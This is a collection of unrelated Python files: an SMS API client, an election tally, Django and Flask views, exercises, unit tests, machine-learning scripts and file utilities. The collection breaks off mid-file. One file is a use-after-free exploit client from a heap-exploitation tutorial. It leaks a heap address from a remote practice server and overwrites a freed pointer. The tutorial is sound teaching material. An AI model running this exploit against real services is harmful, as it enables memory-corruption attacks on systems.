from logger import Logger
class SmsClient(object):
    """
    Send SMS messages through the China Telecom (189.cn) open API.
    Written for Python 2 (urllib/urllib2, print statements).
    """
    def __init__(self, app_id=None, app_secret=None, grant_type='client_credentials'):
        '''
        :param app_id: app id, shown in the Telecom app console
        :param app_secret: app secret, found in the same place
        :param grant_type: OAuth grant type; only client_credentials is implemented
        :return:
        '''
        super(SmsClient, self).__init__()
        self.APP_ID = app_id
        self.APP_SECRET = app_secret
        self.GRANT_TYPE = grant_type

    def _get_time_stamp(self):
        # Build a "Y-M-D H:M:S" timestamp for API requests.
        # NOTE(review): fields are not zero-padded (e.g. "2020-1-2 3:4:5")
        # and each dt.now() call is a separate clock read -- confirm the
        # API accepts this format.
        timestamp = dt.now().year, dt.now().month, dt.now().day, dt.now().hour, dt.now().minute, dt.now().second
        timestamp = "%s-%s-%s %s:%s:%s" % timestamp
        return timestamp

    def _get_access_token(self):
        # Exchange the app credentials for an OAuth access token.
        # Returns the token string on success; on failure logs the
        # response and implicitly returns None.
        url = 'https://oauth.api.189.cn/emp/oauth2/v3/access_token'
        param = {'grant_type': self.GRANT_TYPE, 'app_id': self.APP_ID, 'app_secret': self.APP_SECRET}
        param = urllib.urlencode(param)
        req = urllib2.Request(url, param)
        response = urllib2.urlopen(req).read()
        result = json.loads(response)
        if result['res_code'] == '0':
            Logger.info(result)
            return result['access_token']
        else:
            Logger.error(result)

    def send_sms(self, template_id, template_param, acceptor_tel):
        '''
        :param template_id: template SMS id
        :param template_param: template parameters, a dict
        :param acceptor_tel: recipient number (numbers starting with 0 unsupported)
        :return: the unique message identifier on success; logs the error otherwise
        '''
        url = 'http://api.189.cn/v2/emp/templateSms/sendSms'
        param = {'app_id': self.APP_ID,
                 'access_token': self._get_access_token(),
                 'acceptor_tel': acceptor_tel,
                 'template_id': template_id,
                 'template_param': template_param,
                 'timestamp': self._get_time_stamp(),
                 }
        param = urllib.urlencode(param)
        req = urllib2.Request(url, param)
        response = urllib2.urlopen(req).read()
        result = json.loads(response)
        # NOTE(review): res_code is compared as int 0 here but as the
        # string '0' elsewhere; presumably this endpoint returns a
        # number -- confirm against the API.
        if result['res_code'] == 0:
            Logger.info(result)
            return result['idertifier']
        else:
            Logger.error(result)

    def send_sms_by_list(self, template_id, template_param, tel_list):
        '''
        Send the same template SMS to every number in the list.
        :param template_id: template SMS id
        :param template_param: template parameters, a dict
        :param tel_list: list of recipient phone numbers
        :return: list of identifiers returned by the API, one per recipient
        '''
        result = []
        for tel in tel_list:
            iden = self.send_sms(template_id, template_param, tel)
            result.append(iden)
        return result

    def msg_status(self, identifier):
        # Query the delivery status of a previously-sent message.
        url = 'http://api.189.cn/v2/EMP/nsagSms/appnotify/querysmsstatus'
        message = 'access_token=%s&app_id=%s&identifier=%s&timestamp=%s' % (self._get_access_token(), self.APP_ID, identifier, self._get_time_stamp())
        message = bytes(message).encode('utf-8')
        secret = bytes(self.APP_SECRET).encode('utf-8')
        # NOTE(review): hmac.new(key, msg) expects the KEY first, but
        # here the message is passed as the key and the secret as the
        # msg -- looks swapped; confirm against the 189.cn signing spec.
        sign = base64.b64encode(hmac.new(message, secret, digestmod=hashlib.sha1).digest())
        print message, sign
        param = {'access_token': self._get_access_token(),
                 'app_id': self.APP_ID,
                 'identifier': identifier,
                 'timestamp': self._get_time_stamp(),
                 'sign': sign,
                 }
        param = urllib.urlencode(param)
        req = urllib2.Request(url, param)
        response = urllib2.urlopen(req).read()
        result = json.loads(response)
        if result['res_code'] == '0':
            Logger.info(result)
        else:
            Logger.error(result)
|
# Modules
import os
import csv

# PyPoll: tally votes per candidate from Resources/election_data.csv,
# report each candidate's share of the vote, determine the winner, and
# write the report to the terminal and to PyPollResults.txt.
#
# This rewrite resolves an unresolved git merge conflict (the file
# still contained <<<<<<< / ======= / >>>>>>> markers and two divergent
# copies of the reporting code, one writing to a misspelled
# "PyPollReults.txt"), and fixes the winner logic, which used the
# bitwise `&` operator -- `a > b & a > c` parses as `a > (b & a) > c`,
# not as a logical AND of the comparisons.

# Path to collect data from the Resources folder
elections = os.path.join('Resources', 'election_data.csv')

# Define candidates list
candidates = ["Khan", "Correy", "Li", "O'Tooley"]

# Loop through the data: column 2 holds the candidate's name.  The
# file handle is closed deterministically via `with` (the original
# leaked it, plus one handle per print call on the output file).
totalVotes = 0
voteCounts = {name: 0 for name in candidates}
with open(elections) as infile:
    electionDataCsv = csv.reader(infile)
    header = next(electionDataCsv)
    for row in electionDataCsv:
        totalVotes = totalVotes + 1
        if row[2] in voteCounts:
            voteCounts[row[2]] += 1

khanVotes = voteCounts["Khan"]
correyVotes = voteCounts["Correy"]
liVotes = voteCounts["Li"]
otooleyVotes = voteCounts["O'Tooley"]

# Determine winner (ties resolved in candidate-list order).
winner = max(candidates, key=lambda name: voteCounts[name])

# Define vote percentages
khanPercent = (khanVotes / totalVotes * 100)
correyPercent = (correyVotes / totalVotes * 100)
liPercent = (liVotes / totalVotes * 100)
otooleyPercent = (otooleyVotes / totalVotes * 100)

# Build the report once and send it to both destinations.
resultLines = [
    'Election Results',
    '------------------------',
    f'Total Votes: {totalVotes}',
    '------------------------',
    f'Khan: {khanPercent:.2f}% ({khanVotes})',
    f'Correy: {correyPercent:.2f}% ({correyVotes})',
    f'Li: {liPercent:.2f}% ({liVotes})',
    f"O'Tooley: {otooleyPercent:.2f}% ({otooleyVotes})",
    '------------------------',
    f'Winner: {winner}',
    '------------------------',
]
report = '\n'.join(resultLines)
print(report)
with open("PyPollResults.txt", "a") as outfile:
    print(report, file=outfile)
|
# https://sensepost.com/blog/2017/linux-heap-exploitation-intro-series-used-and-abused-use-after-free/
# Use-after-free walkthrough client (Python 2): reads the target's menu
# over TCP, leaks a heap address from option 4's output, frees the
# chunk (2), reallocates it (1), then overwrites the stale pointer (3)
# with the leaked address and prints again to confirm.
import socket
import re
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('46.101.80.6', 10000)
sock.connect(server_address)
try:
    # hello
    data = sock.recv(1024)
    print 'received: %s' % data
    # options
    data = sock.recv(1024)
    print 'received: %s' % data
    # print
    sock.sendall("4")
    # get address: the pointer is the 5th whitespace-separated token of
    # the reply, up to the first newline, parsed as hex.
    data = sock.recv(1024)
    print 'received: %s' % data
    address = data.strip().split(" ")[4]
    address = address.split("\n")[0]
    address = int(address, 16)
    print address
    # free
    data = sock.recv(1024)
    print 'received: %s' % data
    sock.sendall("2")
    data = sock.recv(1024)
    print 'received: %s' % data
    # remalloc
    data = sock.recv(1024)
    print 'received: %s' % data
    sock.sendall("1")
    data = sock.recv(1024)
    print 'received: %s' % data
    # overwrite the reallocated chunk with the leaked address,
    # packed as a little-endian 64-bit value
    data = sock.recv(1024)
    print 'received: %s' % data
    sock.sendall("3")
    data = sock.recv(1024)
    print 'received: %s' % data
    message = struct.pack("<Q", address)
    print 'sending: %s' % message
    sock.sendall(message)
    data = sock.recv(1024)
    print 'received: %s' % data
    # print
    data = sock.recv(1024)
    print 'received: %s' % data
    sock.sendall("4")
    data = sock.recv(1024)
    print 'received: %s' % data
finally:
    print 'closing socket'
    sock.close()
|
from django.shortcuts import render
from course_management_app.forms import StudentProfileInfoForm , CourseForm
def index(request):
    """Render the landing page of the course-management app."""
    return render(request,'course_management_app/index.html')
# Create your views here.
def userdetails(request):
    """Render the user page with fresh (unbound) student and course forms."""
    context = {
        'stude_form': StudentProfileInfoForm(),
        'course_form': CourseForm(),
        # assignment_form slot reserved — AssignmentForm not wired up yet
    }
    return render(request,'course_management_app/user.html',context)
|
"""(a) Write a function to print the first N numbers of the Fibonacci sequence.
(b) Write a function to print the Nth number of the sequence."""
def fibonacci_sequence(n_series):
    """Print the first `n_series` Fibonacci numbers (1, 1, 2, 3, 5, ...).

    The original started printing at the third term, emitted one extra
    value, and printed a stray 'yes' after every number.  The terms are
    also returned as a list so callers and tests can inspect them
    (backward compatible: the old return value was None).
    """
    terms = []
    a, b = 1, 1
    for _ in range(n_series):
        terms.append(a)
        a, b = b, a + b
    for t in terms:
        print(t)
    return terms
def recursive_fibonacci(n_seiries):
    """Return the n-th Fibonacci number (0-indexed: F(0)=0, F(1)=1)."""
    # Base cases first, as a guard clause.
    if n_seiries in (0, 1):
        return n_seiries
    return recursive_fibonacci(n_seiries - 2) + recursive_fibonacci(n_seiries - 1)
def main():
    """Interactively read a term index and print that Fibonacci number."""
    n_series = int(input("Enter a series "))
    # fibonacci_sequence(n_series)
    nth_term = recursive_fibonacci(n_series)
    print(nth_term)
if __name__ == '__main__':
    main()
|
import unittest
from katas.kyu_7.calculate_meal_total import calculate_total
class CalculateTotalTestCase(unittest.TestCase):
    """Unit tests for calculate_total(meal_cost, tax_pct, tip_pct)."""
    def test_equal_1(self):
        self.assertEqual(calculate_total(5.00, 5, 10), 5.75)
    def test_equal_2(self):
        self.assertEqual(calculate_total(36.97, 7, 15), 45.10)
    def test_equal_3(self):
        # A zero-cost meal stays zero regardless of tax/tip.
        self.assertEqual(calculate_total(0.00, 6, 18), 0.00)
    def test_equal_4(self):
        # Tax of 0%: only the tip is applied.
        self.assertEqual(calculate_total(80.94, 0, 20), 97.13)
    def test_equal_5(self):
        # Tip of 0%: only the tax is applied.
        self.assertEqual(calculate_total(54.96, 8, 0), 59.36)
|
import wx
serverMsgAttr = wx.TextAttr(wx.Colour(128, 0, 0))
clientMsgAttr = wx.TextAttr(wx.Colour(0, 0, 128))
plainMsgAttr = wx.TextAttr(wx.Colour(0, 0, 0))
class MSSPInfo(wx.Dialog):
    """Resizable dialog showing MSSP (MUD Server Status Protocol) key/value
    pairs for one connection; toggled from the status-bar MSSP icon."""
    def __init__(self, conn):
        worldname = conn.world.get('name')
        wx.Dialog.__init__(self, conn, title = "MSSP Info: " + worldname,
            style = wx.RESIZE_BORDER | wx.DEFAULT_DIALOG_STYLE
        )
        self.connection = conn
        # Single static-text pane holding all rendered variables.
        self.output_pane = wx.StaticText(self)
        # TODO - the MSSP messages should live somewhere else, like in telnetiac.mssp or something
        self.mssp_msgs = {}
        sizer = wx.BoxSizer( wx.VERTICAL )
        sizer.Add(self.output_pane, 1, wx.ALL|wx.GROW, 10)
        self.SetSizer(sizer)
        # Clicking the MSSP icon in the status bar shows/hides this dialog.
        self.connection.status_bar.feature_icons['MSSP'].Bind(wx.EVT_LEFT_UP, self.toggle_visible)
        self.update()
    def toggle_visible(self, evt = None):
        """Refresh, re-fit, re-center and flip visibility; pass the event on."""
        self.update()
        self.Fit()
        self.CenterOnParent()
        self.Show(not self.IsShown())
        if evt: evt.Skip()
    def Close(self):
        # Closing just hides: the dialog is reused for the connection's lifetime.
        self.toggle_visible()
    def add_message(self, msg):
        """Merge one MSSP message's key/value pairs and re-render."""
        for k,v in msg.items():
            self.mssp_msgs[k] = v
        self.update()
    def update(self):
        """Re-render all stored MSSP variables, sorted by key."""
        output = ''
        for k in sorted(self.mssp_msgs.keys()):
            output += f"{k}: {self.mssp_msgs[k]}\n"
        self.output_pane.SetLabel(output)
|
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')
# Multivariate linear regression (TensorFlow 1.x graph mode) on exam scores.
data = np.loadtxt('../../data/data-01.csv', delimiter=",")
# print(data)
# Slice out a 2-D label column:
# matrix operations require the tensors to stay 2-D.
x_data = data[:, :-1]
# y_data = data[:, -1:]
y_data = data[:, [-1]]
print("x_data shape : ", x_data.shape)
print("y_data shape : ", y_data.shape)
# One weight per input feature (3), plus a scalar bias.
w = tf.Variable(tf.random_uniform([3, 1]))
b = tf.Variable(tf.random_uniform([1]))
X = tf.placeholder(dtype=tf.float32, shape=(None, 3))
# Labels are baked into the graph as a constant, so only X is fed per run.
y = tf.constant(y_data, dtype=tf.float32)
hx = tf.matmul(X, w) + b
# Mean-squared-error cost, minimized with plain gradient descent.
cost = tf.reduce_mean(tf.square(hx - y))
optimizer = tf.train.GradientDescentOptimizer(0.000001)
train = optimizer.minimize(cost)
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
for i in range(10000):
    sess.run(train, feed_dict={X: x_data})
    if not i % 100:
        print(i, sess.run(cost, feed_dict={X: x_data}))
sess.run(w)
# Predict the score for inputs 100, 98, 81
print(sess.run(hx, feed_dict={X: [[100, 98, 81]]}))
# 73, 80, 75
# Predict the scores for 73, 80, 75 and 93, 88, 93
print(sess.run(hx, feed_dict={X: [[73, 80, 75], [93, 88, 93]]}))
|
from collections import defaultdict
# defaultdict(list) materialises the list on first access, so appending
# to a brand-new key needs no prior initialisation.
instances = defaultdict(list)
for room in ('roomA', 'roomB'):
    instances['InsLocation'].append(room)
print(instances)
for key, value in instances.items():
    print(key)
    print(value)
    print('---')
|
'''Редактирование строк'''
my_array = [14, 92, 13, 58, 25, 61, 26]
my_string = '14, 92, 13,'
my_array[2] = 'тринадцать'
print(my_array)
'''Чтобы заменить символ в строке, используем
метод
⭐️ - .replace('x', 'y', n) - меняем х на у n раз'''
clean_string = my_string.replace(',', '', 2)
print(clean_string)
|
import os
import sys
import getopt
def walkDir(dir):
    """Recursively visit every file under `dir` and prepend two demo lines
    to each via write2file_2.  Destructive: rewrites every file it finds."""
    generator_ = os.walk(dir)
    for rootDir, pathList, fileList in generator_ :
        for f in fileList:
            #print(os.path.join(rootDir, f))
            write2file_2(os.path.join(rootDir, f), ["blablablabla\n", "xxxxx\n"])
#def displayDir2(dir):
# for i in os.listdir(dir):
# file = os.path.join(dir,i)
# if os.path.isdir(file):
# displayDir2(file)
# else:
# print file
def write2file(filepath, str_):
    """Prepend `str_` plus a newline to the existing file at `filepath`.

    The file is opened 'r+', so it must already exist.  The new content is
    strictly longer than the original, so rewriting from offset 0 needs no
    truncate.
    """
    # 'with' closes the handle on every path — the original leaked the
    # descriptor if read/write raised.
    with open(filepath, 'r+') as f:
        original_content = f.read()
        f.seek(0)
        print("original content: " + original_content)
        new_content = str_ + '\n' + original_content
        print("new content: " + new_content)
        f.write(new_content)
def write2file_2(filepath, strList):
    """Prepend every string in `strList` (each newline-terminated) to the
    existing file at `filepath`."""
    # Context manager guarantees the file is closed even on error — the
    # original leaked the descriptor if readlines/writelines raised.
    with open(filepath, 'r+') as f:
        content = f.readlines()
        content = strList + content
        f.seek(0)
        f.writelines(content)
def print_tree_(dir_, parent_prefix, current_level, depth, only_dir):
    '''
    Print the guide lines of 'dir_' down to 'depth' levels.

    dir_          : the directory to print
    parent_prefix : string attached in front of every line ('' recommended)
    current_level : the starting level (0 recommended)
    depth         : 0 or less means NO depth limit
    only_dir      : True to print directories only

    Every line is the parent's prefix, then this entry's own prefix, then
    the entry name.  Fixes vs. the original: the last entry of each level
    now really gets a distinct corner prefix (the two constants were
    accidentally identical despite the comment saying otherwise), and the
    listing is sorted so output is deterministic (os.listdir order is
    arbitrary).
    '''
    if depth > 0 and current_level >= depth:
        return None
    # current_level starts from 0, depth starts from 1.
    current_level += 1
    NORMAL_PREFIX = '|-- '
    NORMAL_PREFIX_4_CHILDREN = '|   '
    LAST_PREFIX = '`-- '
    LAST_PREFIX_4_CHILDREN = '    '
    # TODO: the list is sorted alphabetically; it could also be sorted by
    # other keys, e.g. modification time.
    child_list = sorted(os.listdir(dir_))
    child_list_size = len(child_list)
    for index, child_name in enumerate(child_list):
        child_path = os.path.join(dir_, child_name)
        is_last = index == child_list_size - 1
        prefix = LAST_PREFIX if is_last else NORMAL_PREFIX
        child_prefix = LAST_PREFIX_4_CHILDREN if is_last else NORMAL_PREFIX_4_CHILDREN
        if os.path.isdir(child_path):
            print(parent_prefix + prefix + str(child_name))
            print_tree_(child_path, parent_prefix + child_prefix, current_level, depth, only_dir)
        elif not only_dir:
            print(parent_prefix + prefix + str(child_name))
def print_tree():
    '''Usage:
    utils.py [--dir=xxx] [--depth=xxx] [--only_dir] [--help]
    '''
    # Default values.
    dir_ = '.'
    depth = 0
    only_dir = False
    # A short-option list must be provided to 'getopt', even if empty.
    shortargv = ''
    # Fix: the original declared 'only-dir' here while the handler and the
    # usage text checked '--only_dir', so the flag could never take effect.
    longargv = ['dir=', 'depth=', 'only_dir', 'help']
    try:
        (opts, args) = getopt.getopt(sys.argv[1:], shortargv, longargv)
    except getopt.GetoptError as e:
        print("Errors accured when get options using 'getopt', please check out your options.")
        print("Error:: opt: " + e.opt)
        print("Error:: msg: " + e.msg)
        return None
    for (opt, val) in opts:
        if opt == '--help':
            print("Usage: utils.py [--dir=xxx] [--depth=xxx] [--only_dir] [--help]")
            return None
        elif opt == '--dir' and len(val) > 0:
            dir_ = val
        elif opt == '--depth' and len(val) > 0 and int(val) > 0:
            depth = int(val)
        elif opt == '--only_dir':
            only_dir = True
    if not os.path.isdir(dir_):
        print(str(dir_) + " is not a directory.")
        return None
    print(dir_)
    print_tree_(dir_, '', 0, depth, only_dir)
def filter_files(base_folder, filtered_folder):
    '''Remove from filtered_folder every file that also exists in base_folder.

    e.g. filter_files('res/hdpi/', 'res/xhdpi/') deletes from xhdpi/
    any file name that is also present in hdpi/.
    '''
    if not os.path.isdir(base_folder) or not os.path.isdir(filtered_folder):
        print("Make sure both '%s' and '%s' are folders." % (str(base_folder), str(filtered_folder)))
        return None
    base_names = set(os.listdir(base_folder))
    removed = 0
    for name in os.listdir(filtered_folder):
        candidate = os.path.join(filtered_folder, name)
        #candidate = os.path.realpath(name)
        if name in base_names and os.path.isfile(candidate):
            os.remove(candidate)
            removed += 1
    print("delete %d files." % removed)
if __name__ == '__main__':
    #walkDir("E:/python/tmp")
    #print_tree()
    # NOTE(review): '' is not a directory, so this call only prints the
    # "Make sure both ... are folders." warning — presumably a leftover
    # experiment; confirm the intended second argument.
    filter_files('tmp_1', '')
|
#Test loading in training data
import os
import sys
#Path hack
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_path = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
sys.path.append(parent_path)
#Load modules
from DeepForest.utils.generators import create_NEON_generator, load_training_data, load_retraining_data, create_h5_generators
from DeepForest import config
DeepForest_config = config.load_config(dir="..")
def test_train():
    """Smoke-test: the training data loads and is non-empty."""
    data = load_training_data(DeepForest_config)
    print("Data shape is {}".format(data.shape))
    assert data.shape[0] > 0, "Data is empty"
def test_retrain():
    """Smoke-test: the retraining data loads and is non-empty."""
    data = load_retraining_data(DeepForest_config)
    print("Data shape is {}".format(data.shape))
    assert data.shape[0] > 0, "Data is empty"
# Both checks also run on plain import: the file doubles as a script.
test_train()
test_retrain()
from django.urls import path
from . import views
urlpatterns=[
    # Flight list / landing page.
    path("",views.index,name='index'),
    # Detail page for one flight, keyed by its id.
    path("<int:fid>",views.flight,name='flight'),
    # Booking action for one flight.
    path("<int:fid>/book",views.book,name="book"),
]
|
from gensim.models import word2vec
import numpy as np
import pandas as pd
import os
import re
import pickle
import copy
import sys
from time import sleep
max_length = 50 #max nr of words in sentence
vec_length = 100 #dimensions in word vector
#track movie characters, to differentiat speaker and listener
def init_movie_characters():
    """Map character id -> lower-cased name tokens, read from the Cornell
    character-metadata CSV."""
    meta = pd.read_csv('../res/cornell/movie_characters_metadata.csv', sep=';')
    return {
        row['Id'].lstrip().rstrip(): row['Name'].lstrip().rstrip().lower().split(' ')
        for _, row in meta.iterrows()
    }
#return the wordvector of word if it is known
def VEC(word):
    """Look up `word` in the module-level w2v_model.

    Returns (True, vector) when the word is in the vocabulary and
    (False, None) when the model raises KeyError.
    """
    try:
        return (True,np.array(w2v_model.wv[word]))
    except KeyError:
        return (False,None)
#initialize w2v and IDF models
w2v_model = word2vec.Word2Vec.load('../res/word2vec/semspace')
# .item() unwraps the 0-d object array holding the pickled idf dict
idf_model = np.load('../res/word2vec/idf.npy').item()
#load the dataset with parsed movie lines
with open('movie_lines.p','rb') as f:
    movie_lines = pickle.load(f)
#load the dataset with movie conversations. Conversations are represented as a list of movie lines corresponding with
# keys in movie_lines
movie_conversations = pd.read_csv('../res/cornell/movie_conversations.csv',sep=';')
movie_characters = init_movie_characters()
# Raw text of every movie line, keyed by line id.
movie_line_strings = {}
with open('../res/cornell/movie_lines.txt','r') as f:
    for line in f:
        columns = line.split(' +++$+++ ')
        movie_line_strings[columns[0]] = columns[4].lstrip().rstrip()
#track number of entries for progress reporting
total = movie_conversations['Person1'].count()
j = 0.
#construct the conversation dataset
conversation_dataset = {}
for r in movie_conversations.iterrows():
    sleep(0.0001) #save some CPU space
    print(j/total*100, ' % ', end='\r')
    j += 1
    #keep a buffer of word vectors on hand, so that context information from previous sentences can be
    #input in the rnn along with the current sentence
    # NOTE(review): word_buffer is initialised here but never used below — confirm intent.
    word_buffer = [ np.zeros(100) for _ in range(100) ]
    #try to recognise when a character is talking about themselves or directly at the listener,
    #if so, replace their names with names more suitable for the chatbot scenario
    person1 = movie_characters[ r[1]['Person1'].lstrip().rstrip() ]
    person2 = movie_characters[ r[1]['Person2'].lstrip().rstrip() ]
    line_numbers = re.sub('[^L0-9 ]+','',r[1]['Lines'].lstrip().rstrip()).split(' ')
    conversation = [ (line_idx,movie_lines[line_idx+' ']) for line_idx in line_numbers ]
    sentences = []
    for i,(line_idx,sentence) in enumerate(conversation):
        # Decide who speaks this line; the other party is the listener.
        speaker = person1 if sentence['user'].lstrip().rstrip() == r[1]['Person1'].lstrip().rstrip() else person2
        listener = person2 if speaker == person1 else person1
        # NOTE(review): `line` appears to be a list of word tokens (it is
        # iterated word-by-word below) — confirm against the movie_lines.p format.
        line = sentence['line']
        try:
            for speaker_name in speaker:
                line = [re.sub(' '+speaker_name+'\)', ' brepo)', word) for word in line ]
            for listener_name in listener:
                line = [re.sub(' '+listener_name+'\)', ' human)', word) for word in line ]
        except KeyError:
            raise
        except Exception as e:
            print(e)
            print("I fucked up with",speaker, "or", listener)
        # Collect idf-weighted vectors for the words the model knows.
        sentence_word_vector = []
        for word in line:
            try:
                word_vec = w2v_model.wv[word] * idf_model[word]
                sentence_word_vector.append(word_vec)
            except KeyError:
                continue
        #the meaning of a sentence is represented as the mean of the word vectors multiplied with the idf of the word
        sentence_vector = np.mean( np.array(sentence_word_vector) , axis=0 )
        #keep track of the original line
        sentence_string = movie_line_strings[line_idx]
        #store which movie line is the desired response to this sentence
        next_line_idx = None if i+1 >= len(conversation) else conversation[i+1][0]
        #store in dictionary
        conversation_dataset[line_idx] = { 'line_idx':line_idx,
                                           'sentence_string':sentence_string,
                                           'sentence_word_vector':sentence['line'],
                                           'sentence_vector':sentence_vector,
                                           'next_line_idx':next_line_idx}
#save dictionary
with open('../res/word2vec/conversation_dataset.p','w+b') as fp:
    pickle.dump(conversation_dataset,fp,protocol=pickle.HIGHEST_PROTOCOL)
|
import os
import sys
def split_file(path, neighbourhood):
    """Split '<path>/<neighbourhood[0]>.txt' into len(neighbourhood)-1 files.

    The source file's lines are divided into roughly equal chunks and each
    chunk is written to '<path>/<neighbourhood[i]>.txt' for i = 1..N-1.

    Fixes vs. the original: os.path.join instead of a hard-coded mix of
    '\\' and '/' separators (Windows-only), ceil-division for the chunk
    size (floor division could yield more chunks than target names and
    raise IndexError on a remainder), and context managers so no file
    handle leaks.
    """
    with open(os.path.join(path, f'{neighbourhood[0]}.txt'), 'r') as src:
        lines = src.read().split('\n')
    target_count = len(neighbourhood) - 1
    print(target_count)
    linetotal = len(lines)
    print(linetotal)
    # Ceil division guarantees at most `target_count` chunks.
    splitLen = -(-linetotal // target_count)
    print(splitLen)
    i = 1
    for start in range(0, linetotal, splitLen):
        with open(os.path.join(path, f'{neighbourhood[i]}.txt'), 'w') as output:
            output.write('\n'.join(lines[start: start + splitLen]))
        i += 1
    print("succesfully splited")
if __name__=="__main__":
lis = sys.argv[2:]
o_path = os.path.abspath(os.path.realpath(sys.argv[1]))
path = (f'{o_path}\{lis[0]}')
split_file(path, lis) |
from django.contrib import admin
from .models import Submission, Conference
# Expose both models in the Django admin with the default ModelAdmin.
admin.site.register(Submission)
admin.site.register(Conference)
from unittest import TestCase
from mdat import core
__author__ = 'pbc'
class TestChoquetIntegral(TestCase):
    """Unit tests for core.ChoquetIntegral.

    Uses assertAlmostEqual: the original called the deprecated alias
    assertAlmostEquals, which was removed in Python 3.12.
    """
    def test_get_criteria_keys_sorted_by_value(self):
        """Keys must come back ordered by ascending criterion value."""
        criteria = {'c1': .6, 'c2': .8, 'c3': .9, 'c4': .2}
        expected_key_order = ['c4', 'c1', 'c2', 'c3']
        ci = core.ChoquetIntegral(criteria=criteria)
        ci.get_criteria_keys_sorted_by_value()
        # verify the correct attribute is set
        self.assertEqual(ci.criteria_keys_sorted_by_value, expected_key_order)
        # verify the correct array is returned is set
        self.assertEqual(ci.get_criteria_keys_sorted_by_value(), expected_key_order)
    def test_calculate(self):
        """The integral must match hand-computed values for two fixtures."""
        criteria = {'c1': .6, 'c2': .8, 'c3': .9, 'c4': .2}
        fuzzyMeasure = {
            frozenset(['c3', 'c4']): 0.32,
            frozenset(['c3', 'c2', 'c4']): 0.56,
            frozenset(['c3', 'c1']): 0.98,
            frozenset(['c3', 'c2']): 0.27,
            frozenset([]): 0,
            frozenset(['c3', 'c1', 'c4']): 0.98,
            frozenset(['c2']): 0.2375,
            frozenset(['c3', 'c2', 'c1', 'c4']): 1,
            frozenset(['c3', 'c2', 'c1']): 0.99,
            frozenset(['c1']): 0.325,
            frozenset(['c2', 'c1']): 0.81,
            frozenset(['c2', 'c1', 'c4']): 0.99,
            frozenset(['c4']): 0.25,
            frozenset(['c1', 'c4']): 0.97,
            frozenset(['c2', 'c4']): 0.27,
            frozenset(['c3']): 0.1875
        }
        expected_ChoquetIntegral = 0.66875
        ci = core.ChoquetIntegral(criteria=criteria, fuzzyMeasure=fuzzyMeasure)
        self.assertAlmostEqual(ci.calculate(), expected_ChoquetIntegral)
        # Run second test
        criteria = {
            'c1': 0.2,
            'c2': 0.4,
            'c3': 0.1
        }
        fuzzyMeasure = {
            frozenset([]): 0,
            frozenset(['c1']): 0.391304347826087,
            frozenset(['c2']): 0.3478260869565218,
            frozenset(['c3']): 0.2608695652173913,
            frozenset(['c1', 'c2']): 0.7683779330072605,
            frozenset(['c1', 'c3']): 0.8093446720056068,
            frozenset(['c2', 'c3']): 0.41548536225285937,
            frozenset(['c1', 'c2', 'c3']): 1
        }
        expected_ChoquetIntegral = 0.2464030107
        ci2 = core.ChoquetIntegral(criteria=criteria, fuzzyMeasure=fuzzyMeasure)
        self.assertAlmostEqual(ci2.calculate(), expected_ChoquetIntegral)
|
from dataStore import dataStore
fileAccess = ["/home/anushabangi/test1.py", "/home/anushabangi/test2.py"]
inodes = ["testnode1", "testnode2"]
computationTime = [19.00, 20.00]
dataObject = dataStore(fileAccess,inodes,computationTime)
print("Printing Object Values ...")
dataObject.showData()
print("Printing file dictionary")
dataObject.fileData()
|
from flask import Blueprint, request
from sqlalchemy.exc import SQLAlchemyError
import json
from app.models import Loan, db
from app.utils.error_handling import make_error, check_types, check_types_with_none
loan_routes = Blueprint("loan", __name__)
@loan_routes.route("/<int:id>", methods=["GET"])
def get_loan(id):
try:
loan = Loan.query.get(id)
if loan :
return loan.to_dict(), 200
else:
return make_error(400, "Loan Not Found")
except SQLAlchemyError as e:
return make_error(500, f'Internal Server Error: {repr(e)}')
@loan_routes.route("/<int:id>", methods=["PUT"])
def update_loan(id):
try:
loan = Loan.query.get(id)
payload = json.loads(request.data)
error = check_types_with_none(payload)
if(error): return error
loan.amount = payload["amount"] if "amount" in payload else loan.amount
loan.interest_rate = payload["interest_rate"] if "interest_rate" in payload else loan.interest_rate
loan.loan_length = payload["loan_length"] if "loan_length" in payload else loan.loan_length
loan.monthly_payment = payload["monthly_payment"] if "monthly_payment" in payload else loan.monthly_payment
db.session.commit()
return {"message": "Loan updated",
"loan": loan.to_dict()}, 200
except (ValueError, KeyError, TypeError) as e:
db.session.rollback()
return make_error(400, f'JSON Format Error: {repr(e)}')
except SQLAlchemyError as e:
db.session.rollback()
return make_error(500, f'Internal Server Error: {repr(e)}')
@loan_routes.route("/<int:id>", methods=["DELETE"])
def delete_loan(id):
try:
loan = Loan.query.get(id)
if loan :
db.session.delete(loan)
db.session.commit()
return {"message": "Delete Successful."}, 200
else:
db.session.rollback()
return make_error(400, "Loan not found")
except SQLAlchemyError as e:
db.session.rollback()
return make_error(500, f'Internal Server Error: {repr(e)}')
@loan_routes.route("/", methods=["GET"])
def get_loans():
try:
loans = Loan.query.all()
if loans:
return {loan.id: loan.to_dict() for loan in loans}, 200
else:
return make_error(400, "Loans not found")
except SQLAlchemyError as e:
return make_error(500, f'Internal Server Error: {repr(e)}'),
@loan_routes.route("/", methods=[ "POST"])
def create_loan():
try:
payload = json.loads(request.data)
error = check_types(payload)
if(error): return error
new_loan = Loan(
amount=payload["amount"],
interest_rate=payload["interest_rate"],
loan_length=payload["loan_length"],
monthly_payment=payload["monthly_payment"],
)
db.session.add(new_loan)
db.session.commit()
return {"message": "Loan Created",
"loan": new_loan.to_dict()}, 201
except (ValueError, KeyError, TypeError) as e:
db.session.rollback()
return make_error(400, f'JSON Format Error: {repr(e)}')
except SQLAlchemyError as e:
db.session.rollback()
return make_error(500, f'Internal Server Error: {repr(e)}')
|
'''
Created on Mar 28, 2015
@author: anthonydito
'''
import cPickle
import logging
import psycopg2
import socket
import threading
from Tkinter import *
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-15s) %(message)s',
)
class aiUser(Frame):
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
try:
self.insock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
logging.debug('Failed to create socket. Error code: '
+ str(msg[0]) + ' , Error message : '
+ msg[1]
)
try:
self.outsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
logging.debug('Failed to create socket. Error code: '
